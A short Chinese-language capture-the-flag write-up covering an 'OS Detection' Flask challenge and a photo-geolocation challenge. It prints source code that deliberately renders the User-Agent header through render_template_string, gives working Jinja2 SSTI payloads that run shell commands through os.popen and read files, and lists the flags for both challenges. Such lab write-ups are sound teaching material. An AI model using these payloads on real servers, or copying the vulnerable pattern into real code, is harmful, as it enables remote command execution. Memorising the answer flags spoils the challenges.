心得

清大特選面完回家剛好有空時間，所以摸了一下。

Writeup

OS Detection

A new service has been deployed that uses advanced algorithms to detect your Operating System. What an invasion of privacy! Can you pwn it?

Source Code:

from flask import Flask, request, render_template, render_template_string
from ua_parser import user_agent_parser

app = Flask(__name__)

@app.route("/")
def home():
    user_agent = request.headers.get('User-Agent')
    try:
        parsed_string = user_agent_parser.Parse(user_agent)
        family = parsed_string['os']['family']
        user_agent_hint = render_template_string(user_agent)
        return render_template('index.html', os=family, user_agent=user_agent_hint)
    except Exception as e:
        return render_template('failure.html', error=str(e))
    
@app.route("/source")
def source():
    code = open(__file__).read()
    return render_template_string("<pre>{{ code }}</pre>", code=code)
    

if __name__ == "__main__":
    # No debug, that would be insecure!
    #app.run(debug=True)
    app.run()

可以看到 user_agent 處傳進去有 SSTI 漏洞

先 ls

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read() }}

__pycache__
app.py
flag
requirements.txt
templates

然後讀檔，發現是目錄

{{ get_flashed_messages.__globals__.__builtins__.open("flag").read() }}

[Errno 21] Is a directory: 'flag'

進去裡面，裡面有 flag.txt，讀他

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('cd flag && cat flag.txt').read() }}

PP{h4ck3r-OS-d3t3ct3d::Hn5mQK8Nsukp}

Fall

Which building can be seen in this pretty fall photo?

The flag should be entered like PP{nameofbuilding}, where nameofbuilding is the name of the pictured building in the language of the country it is in. There are only lowercase letters and no spaces, diacritics or other special characters in the flag.

Sol:Google 以圖搜圖，解決

PP{orangerieschloss}